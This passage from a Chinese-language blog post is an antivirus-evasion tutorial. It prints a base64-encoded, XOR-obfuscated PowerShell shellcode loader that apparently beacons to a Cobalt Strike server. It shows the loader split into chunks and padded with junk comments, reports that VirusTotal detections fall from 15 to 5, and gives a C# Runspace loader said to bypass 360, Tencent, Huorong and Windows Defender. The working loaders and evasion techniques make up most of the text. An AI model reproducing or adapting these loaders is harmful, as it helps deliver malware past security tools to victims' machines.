vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpTdGFuZGFyZCwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZU1ldGhvZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlwZSwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlX2J1aWxkZXIuQ3JlYXRlVHlwZSgpCn0KCltCeXRlW11dJHZhcl9jb2RlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMzh1cUl5TWpRNnJHRXZGSHFIRVRxSEV2cUhFM3FGRUxMSlJwQlJMY0V1T1BIMEpmSVE4RDR1d3VJdVRCMDNGMHFIRXpxR0VmSXZPb1kxdW00MWRwSXZOenFHczdxSHNESXZEQUgycW9GNmdpOVJMY0V1T1A0dXd1SXVRYncxYlhJRjdiR0Y0SFZzRjdxSHNISXZCRnFDOW9xSHMvSXZDb0o2Z2k4NnBuQndkNGVFSjZlWExjdzN0OGVhZ3h5S1YrUzAxR1Z5TkxWRXBOU25kTGIxUUZKTnoyRXR4MGRIUjBkRXNaZFZxRTNQYktweU1qSTNnUzZuSnlTU0J5Y2t0M1BDTWpjSE5MZEtxODVkejJ5Rk40RXZGeFN5TWhZNmR4Y1hGd2NYTkx5SFlOR056MnF1V2c0SE1TM0hSMFNkeHdkVXNPSlR0WTNQYW00eXluNENJakl4TGNwdFZYSjZyYXlDcExpZWJCZnR6MnF1SkxaZ0o5RXR6MkV0eDBTU1J5ZFhOTGxIVERLTnoybkNNTUl5TWE1RmVVRXR6S3NpSWpJOHJxSWlNank2amMzTndNVDJSM2RpTVdiQUp6Qm1OaWMzZ1hmM041ZXhZWEMzTjlDaFJnWUFvVVhnZG1hbUJpY1E1d2QySnRaMkp4Wnc1aWJYZHFkV3B4ZG5BT2QyWndkdzVsYW05bUFnZHJDR3NKSXhac0FuTUdJM1pRUmxFT1lrUkdUVmNaQTI1TVdVcFBUMElNRmcwVEF3dEFURTVUUWxkS1FVOUdHQU51Y0dwbUF4b05FeGdEZEVwTlIweFVVQU50ZHdNVkRSSVlBM2RSU2tkR1RWY01GZzBUQ2k0cEl4WnNBbk1HWTJKemVCZC9jM2w3RmhjTGMzMEtGR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdGQycDFhbkYyY0E1M1puQjNEbVZxYjJZQ0Iyc0lhd2tqRm13Q2N3WmpZbk40RjM5emVYc1dGd3R6ZlFvVVlHQUtGRjRIWm1wZ1luRU9jSGRpYldkaWNXY09ZbTEzYW5WcWNYWndEbmRtY0hjT1pXcHZaZ0lIYXdockNTTVdiQUp6Qm1OaWMzZ1hmM041ZXhZWEMzTjlDaFJnWUFvVVhnZG1hbUJpY1E1d2QySnRaMkp4Wnc1aWJYZHFkV3B4ZG5BT2QyWndkdzVsYW05bUFnZHJDR3NKSXhac0FuTUdZMkp6ZUJkL2MzbDdGaGNMYzMwS0ZDTkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNFaE1ORWhNTkVoTU5FaElYSXlNakl5TT0nKQoKZm9yICgkeCA9IDA7ICR4IC1sdCAkdmFyX2NvZGUuQ291bnQ7ICR4KyspIHsKCSR2YXJfY29kZVskeF0gPSAkdmFyX2NvZGVbJHhdIC1ieG9yIDM1Cn0KCiR2YXJfdmEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dWFsQWxsb2MpLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSW50MzJdKSAoW0ludFB0cl0pKSkKJHZhcl9idWZmZXIgPSAkdmFyX3ZhLkludm9rZShbSW50UHRyXTo6WmVybywgJHZhcl9jb2RlLkxlbmd0aCwgMHgzMDAwLCAweDQwKQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCR2YXJfY29kZSwgMCwgJHZhcl9idWZmZXIsICR2YXJfY29kZS5sZW5ndGgpCgokdmFyX3J1bm1lID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoJHZhcl9idWZmZXIsIChmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIEAoW0ludFB0cl0pIChbVm9pZF0pKSkKJHZhcl9ydW5tZS5JbnZva2UoW0ludFB0cl06Olplcm8p
'@

$p1 = 'ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3V'

$p2 = 'uc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kdWxlKSkpKSwgJHZhcl9wcm9jZWR1cmUpKQp9CgpmdW5jdGlvbiBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpTdGFuZGFyZCwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZU1ldGhvZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlwZSwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlX2J1aWxkZXIuQ3JlYXRlVHlwZSgpCn0KCltCeXRlW11dJHZhcl9jb2RlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMzh1cUl5TWpRNnJHRXZGSHFIRVRxSEV2cUhFM3FGRUxMSlJwQlJMY0V1T1BIMEpmSVE4RDR1d3VJdVRCMDNGMHFIRXpxR0VmSXZPb1kxdW00MWRwSXZOenFHczdxSHNESXZEQUgycW9GNmdpOVJMY0V1T1A0dXd1SXVRYncxYlhJRjdiR0Y0SFZzRjdxSHNISXZCRnFDOW9xSHMvSXZDb0o2Z2k4NnBuQndkNGVFSjZlWExjdzN0OGVhZ3h5S1YrUzAxR1Z5TkxWRXBOU25kTGIxUUZKTnoyRXR4MGRIUjBkRXNaZFZxRTNQYktweU1qSTNnUzZuSnlTU0J5Y2t0M1BDTWpjSE5MZEtxODVkejJ5Rk40RXZGeFN5TWhZNmR4Y1hGd2NYTkx5SFlOR056MnF1V2c0SE1TM0hSMFNkeHdkVXNPSlR0WTNQYW00eXluNENJakl4TGNwdFZYSjZyYXlDcExpZWJCZnR6MnF1SkxaZ0o5RXR6MkV0eDBTU1J5ZFhOTGxIVERLTnoybkNNTUl5TWE1RmVVRXR6S3NpSWpJOHJxSWlNank2amMzTndNVDJSM2RpTVdiQUp6Qm1OaWMzZ1hmM041ZXhZWEMzTjlDaFJnWUFvVVhnZG1hbUJpY1E1d2QySnRaMkp4Wnc1aWJYZHFkV3B4ZG5BT2QyWndkdzVsYW05bUFnZHJDR3NKSXhac0FuTUdJM1pRUmxFT1lrUkdUVmNaQTI1TVdVcFBUMElNRmcwVEF3dEFURTVUUWxkS1FVOUdHQU51Y0dwbUF4b05FeGdEZEVwTlIweFVVQU50ZHdNVkRSSVlBM2RSU2tkR1RWY01GZzBUQ2k0cEl4WnN'
$p3 = 'Bbk1HWTJKemVCZC9jM2w3RmhjTGMzMEtGR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdGQycDFhbkYyY0E1M1puQjNEbVZxYjJZQ0Iyc0lhd2tqRm13Q2N3WmpZbk40RjM5emVYc1dGd3R6ZlFvVVlHQUtGRjRIWm1wZ1luRU9jSGRpYldkaWNXY09ZbTEzYW5WcWNYWndEbmRtY0hjT1pXcHZaZ0lIYXdockNTTVdiQUp6Qm1OaWMzZ1hmM041ZXhZWEMzTjlDaFJnWUFvVVhnZG1hbUJpY1E1d2QySnRaMkp4Wnc1aWJYZHFkV3B4ZG5BT2QyWndkdzVsYW05bUFnZHJDR3NKSXhac0FuTUdZMkp6ZUJkL2MzbDdGaGNMYzMwS0ZDTkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNFaE1ORWhNTkVoTU5FaElYSXlNakl5TT0nKQoKZm9yICgkeCA9IDA7ICR4IC1sdCAkdmFyX2NvZGUuQ291bnQ7ICR4KyspIHsKCSR2YXJfY29kZVskeF0gPSAkdmFyX2NvZGVbJHhdIC1ieG9yIDM1Cn0KCiR2YXJfdmEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dWFsQWxsb2MpLCAoZnVuY19nZX'
$p4 = 'RfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSW50MzJdKSAoW0ludFB0cl0pKSkKJHZhcl9idWZmZXIgPSAkdmFyX3ZhLkludm9rZShbSW50UHRyXTo6WmVybywgJHZhcl9jb2RlLkxlbmd0aCwgMHgzMDAwLCAweDQwKQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCR2YXJfY29kZSwgMCwgJHZhcl9idWZmZXIsICR2YXJfY29kZS5sZW5ndGgpCgokdmFyX3J1bm1lID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoJHZhcl9idWZmZXIsIChmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIEAoW0ludFB0cl0pIChbVm9pZF0pKSkKJHZhcl9ydW5tZS5JbnZva2UoW0ludFB0cl06Olplcm8p'


#$bbb= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($AAA))
$bbb= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($p1+$p2+$p3+$p4))
If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $bbb | wait-job | Receive-Job
}
else {
	IEX $bbb  
}

可以上线CS

截图

在VT上没啥变化

截图

在进行变换试试

这里不止可以使用base64 还可以去用 AES 异或 ASCII等方式进行加密 也可以添加一些垃圾注释进行干扰

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
Set-StrictMode -Version 2

#asdYyY0E1hd2tqRm13Q2N3Wessda2mpdGd3R6w1da3RmhjTGMzMEt13G9rZShbSW50UHRyXTo6Wm5dasCM1ltMW5ZbkZuRG1KdG9rZShbSW50UHRyXTo63r2sdaQycDFhbkYZlFvVVlHQ
$a314fpda9 = 'ZnVuY3Rpb24gZnVuY19nZXRfcHJvY19hZGRyZXNzIHsKCVBhcmFtICgkdmFyX21vZHVsZSwgJHZhcl9wcm9jZWR1cmUpCQkKCSR2YXJfdW5zYWZlX25hdGl2ZV9tZXRob2RzID0gKFtBcHBEb21haW5dOjpDdXJyZW50RG9tYWluLkdldEFzc2VtYmxpZXMoKSB8IFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uRXF1YWxzKCdTeXN0ZW0uZGxsJykgfSkuR2V0VHlwZSgnTWljcm9zb2Z0LldpbjMyLlVuc2FmZU5hdGl2ZU1ldGhvZHMnKQoJJHZhcl9ncGEgPSAkdmFyX3V'
#asdYyY0E1M1puQjNEbVZasdxYjJZ356dqqQ0Iyew4cas0lhd2tqRm13Q2N3Wes2mpZbk40RjM5emVYc1dGd3R6ZlFvVVlHQ
$psdaadsas = 'uc2FmZV9uYXRpdmVfbWV0aG9kcy5HZXRNZXRob2QoJ0dldFByb2NBZGRyZXNzJywgW1R5cGVbXV0gQCgnU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZicsICdzdHJpbmcnKSkKCXJldHVybiAkdmFyX2dwYS5JbnZva2UoJG51bGwsIEAoW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5IYW5kbGVSZWZdKE5ldy1PYmplY3QgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLkhhbmRsZVJlZigoTmV3LU9iamVjdCBJbnRQdHIpLCAoJHZhcl91bnNhZmVfbmF0aXZlX21ldGhvZHMuR2V0TWV0aG9kKCdHZXRNb2R1bGVIYW5kbGUnKSkuSW52b2tlKCRudWxsLCBAKCR2YXJfbW9kdWxlKSkpKSwgJHZhcl9wcm9jZWR1cmUpKQp9CgpmdW5jdGlvbiBmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIHsKCVBhcmFtICgKCQlbUGFyYW1ldGVyKFBvc2l0aW9uID0gMCwgTWFuZGF0b3J5ID0gJFRydWUpXSBbVHlwZVtdXSAkdmFyX3BhcmFtZXRlcnMsCgkJW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJHZhcl9yZXR1cm5fdHlwZSA9IFtWb2lkXQoJKQoKCSR2YXJfdHlwZV9idWlsZGVyID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uRGVmaW5lRHluYW1pY0Fzc2VtYmx5KChOZXctT2JqZWN0IFN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5TmFtZSgnUmVmbGVjdGVkRGVsZWdhdGUnKSksIFtTeXN0ZW0uUmVmbGVjdGlvbi5FbWl0LkFzc2VtYmx5QnVpbGRlckFjY2Vzc106OlJ1bikuRGVmaW5lRHluYW1pY01vZHVsZSgnSW5NZW1vcnlNb2R1bGUnLCAkZmFsc2UpLkRlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLCBBdXRvQ2xhc3MnLCBbU3lzdGVtLk11bHRpY2FzdERlbGVnYXRlXSkKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZUNvbnN0cnVjdG9yKCdSVFNwZWNpYWxOYW1lLCBIaWRlQnlTaWcsIFB1YmxpYycsIFtTeXN0ZW0uUmVmbGVjdGlvbi5DYWxsaW5nQ29udmVudGlvbnNdOjpTdGFuZGFyZCwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCSR2YXJfdHlwZV9idWlsZGVyLkRlZmluZU1ldGhvZCgnSW52b2tlJywgJ1B1YmxpYywgSGlkZUJ5U2lnLCBOZXdTbG90LCBWaXJ0dWFsJywgJHZhcl9yZXR1cm5fdHlwZSwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlX2J1aWxkZXIuQ3JlYXRlVHlwZSgpCn0KCltCeXRlW11dJHZhcl9jb2RlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMzh1cUl5TWpRNnJHRXZGSHFIRVRxSEV2cUhFM3FGRUxMSlJwQlJMY0V1T1BIMEpmSVE4RDR1d3VJdVRCMDNGMHFIRXpxR0VmSXZPb1kxdW00MWRwSXZOenFHczdxSHNESXZEQUgycW9GNmdpOVJMY0V1T1A0dXd1SXVRYncxYlhJRjdiR0Y0SFZzRjdxSHNISXZCRnFDOW9xSHMvSXZDb0o2Z2k4NnBuQndkNGVFSjZlWExjdzN0OGVhZ3h5S1YrUzAxR1Z5TkxWRXBOU25kTGIxUUZKTnoyRXR4MGRIUjBkRXNaZFZxRTNQYktweU1qSTNnUzZuSnlTU0J5Y2t0M1BDTWpjSE5MZEtxODVkejJ5Rk40RXZGeFN5TWhZNmR4Y1hGd2NYTkx5SFlOR056MnF1V2c0SE1TM0hSMFNkeHdkVXNPSlR0WTNQYW00eXluNENJakl4TGNwdFZYSjZyYXlDcExpZWJCZnR6MnF1SkxaZ0o5RXR6MkV0eDBTU1J5ZFhOTGxIVERLTnoybkNNTUl5TWE1RmVVRXR6S3NpSWpJOHJxSWlNank2amMzTndNVDJSM2RpTVdiQUp6Qm1OaWMzZ1hmM041ZXhZWEMzTjlDaFJnWUFvVVhnZG1hbUJpY1E1d2QySnRaMkp4Wnc1aWJYZHFkV3B4ZG5BT2QyWndkdzVsYW05bUFnZHJDR3NKSXhac0FuTUdJM1pRUmxFT1lrUkdUVmNaQTI1TVdVcFBUMElNRmcwVEF3dEFURTVUUWxkS1FVOUdHQU51Y0dwbUF4b05FeGdEZEVwTlIweFVVQU50ZHdNVkRSSVlBM2RSU2tkR1RWY01GZzBUQ2k0cEl4WnN'#adfijkhiu2y988hdcbnkjhiugsdaaslkh2eoiheiuoe2hncxxlknxc nvdh9802yuhiodhoahjieasssreshelsa1s
$213rdsaf3 = 'Bbk1HWTJKemVCZC9jM2w3RmhjTGMzMEtGR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdGQycDFhbkYyY0E1M1puQjNEbVZxYjJZQ0Iyc0lhd2tqRm13Q2N3WmpZbk40RjM5emVYc1dGd3R6ZlFvVVlHQUtGRjRIWm1wZ1luRU9jSGRpYldkaWNXY09ZbTEzYW5WcWNYWndEbmRtY0hjT1pXcHZaZ0lIYXdockNTTVdiQUp6Qm1OaWMzZ1hmM041ZXhZWEMzTjlDaFJnWUFvVVhnZG1hbUJpY1E1d2QySnRaMkp4Wnc1aWJYZHFkV3B4ZG5BT2QyWndkdzVsYW05bUFnZHJDR3NKSXhac0FuTUdZMkp6ZUJkL2MzbDdGaGNMYzMwS0ZDTkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNFaE1ORWhNTkVoTU5FaElYSXlNakl5TT0nKQoKZm9yICgkeCA9IDA7ICR4IC1sdCAkdmFyX2NvZGUuQ291bnQ7ICR4KyspIHsKCSR2YXJfY29kZVskeF0gPSAkdmFyX2NvZGVbJHhdIC1ieG9yIDM1Cn0KCiR2YXJfdmEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dWFsQWxsb2MpLCAoZnVuY19nZX'#fasdhnkjlh2iuhjdcb789gheh289hsko-0e22e
#asdYyY0E1hd2tqRm13Q2N3Wes2mpZbk40RjM5emVYfadsraeawweaewjTGMzMEtG9rZShbSW50UHRyXTo6WmVybyR0JnQ2hSZUIyWnFZsadaR0p4RG5CM1ltMw23142W5ZbkZuRG1KdG9rZShbSW50UHRyXTo6WmVybyQycDFhbkYZlFvVVlHQ
$1sdasfp24 = 'RfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSW50MzJdKSAoW0ludFB0cl0pKSkKJHZhcl9idWZmZXIgPSAkdmFyX3ZhLkludm9rZShbSW50UHRyXTo6WmVybywgJHZhcl9jb2RlLkxlbmd0aCwgMHgzMDAwLCAweDQwKQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCR2YXJfY29kZSwgMCwgJHZhcl9idWZmZXIsICR2YXJfY29kZS5sZW5ndGgpCgokdmFyX3J1bm1lID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoJHZhcl9idWZmZXIsIChmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIEAoW0ludFB0cl0pIChbVm9pZF0pKSkKJHZhcl9ydW5tZS5JbnZva2UoW0ludFB0cl06Olplcm8p'
#asdYyY0E1hd2tqRm13Q2N3Wes2mpZbk40RjM5emVYc1dGd3R6w3RmhjTGMzMEtG9rZShbSW50UHRyXTo6WmVybyR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdG9rZShbSW50UHRyXTo6WmVybyQycDFhbkYZlFvVVlHQ

$bbb= [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a314fpda9+$psdaadsas+$213rdsaf3+$1sdasfp24))#JKemVCZC9jM2w3RmhjTGkkyTWpkRXQ3aDNERzNQYXdtaU00MWZscUNRaTRLYmpWc1o3NE11SzN0emNFaE1ORWhNTkVoTU5FaElYSXlNa)
If ([IntPtr]::size -eq 8  ) {#asdYyY0E1hd2tqRm13Q2N3Wes2mpZbk40RjM5emVYc1dGd3R6w3RmhjTGMzMEtG9rZShbSW50UHRyXTo6WmVybyR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdG9rZShbSW50UHRyXTo6WmVybyQycDFhbkYZlFvVVlHQ
	start-job { param($a) IEX $a } -RunAs32 -Argument $bbb | wait-job | Receive-Job #dsasafaaffafaaffaasdsa31241412sdad231 rfdadsaf43gv213aat64zxcr
}
else {
	IEX $bbb  #asd22jnk43lhjsd9u23nkl#asdYyY0E1hd2tqRm13Q2N3Wes2mpZbk40RjM5emVYc1dGd3R6w3RmhjTGMzMEtG9ryXTo6WmVybyR0JnQ2hSZUIyWnFZR0p4RG5CM1ltMW5ZbkZuRG1KdG9rZShbSW50UHRyXTo6WmVybyQycDFhbkYZlFvVVlHQf89dy890w3epoi2j231r34ra
}
截图

可以看到从15减到了5 添加垃圾注释还是有效果的 但是被amsi拦截了 无法绕过WinDef

https://mp.weixin.qq.com/s/znyLqniUX_WXRizGV6TQlA

这篇文章将ps的payload 随机分段 这样每次都不会相同 而杀软有时会记录特征 固定的几段可能会失效,而随机切片分段效果会好些


C#调用WINAPI

项目地址 https://github.com/INotGreen/nopowershell 感谢格林师傅提供的免杀文章

在VS中导入C:Files (x86)Assemblies\3.0 到项目中

通过调用windows的API去执行powershell命令 从而去绕过360对powershell的禁用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
using System;
using System.Management.Automation.Runspaces;
using System.Text;

namespace nopowershell
{
    class Programe
    {
        static void Main(string[] args)
        {
            byte[] psrevshell = Convert.FromBase64String("Y2FsYw=="); //base64 ps1 shellcode
            string decodedString = Encoding.UTF8.GetString(psrevshell);
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();
            Pipeline pipeline = rs.CreatePipeline();
            pipeline.Commands.AddScript(decodedString);
            pipeline.Invoke();
            rs.Close();
        }
    }
}


编译后 动态静态都可过360 腾讯 火绒 但是在运行后会出现一个黑框,需要改一下项目(修改项目的属性--> 输出类型 改为 Windows应用程序即可消除黑框)

这个也可以绕过WinDef


References

感谢格林大佬的提供的学习文章和项目 Orz !!!

https://github.com/INotGreen/nopowershell

https://blog.csdn.net/Hungchuiho/article/details/121436429

https://mamor5409.github.io/posts/359bf983/

https://mp.weixin.qq.com/s/znyLqniUX_WXRizGV6TQlA

欢迎关注我的其它发布渠道

------------- 💖 🌞 本 文 结 束 😚 感 谢 您 的 阅 读 🌞 💖 -------------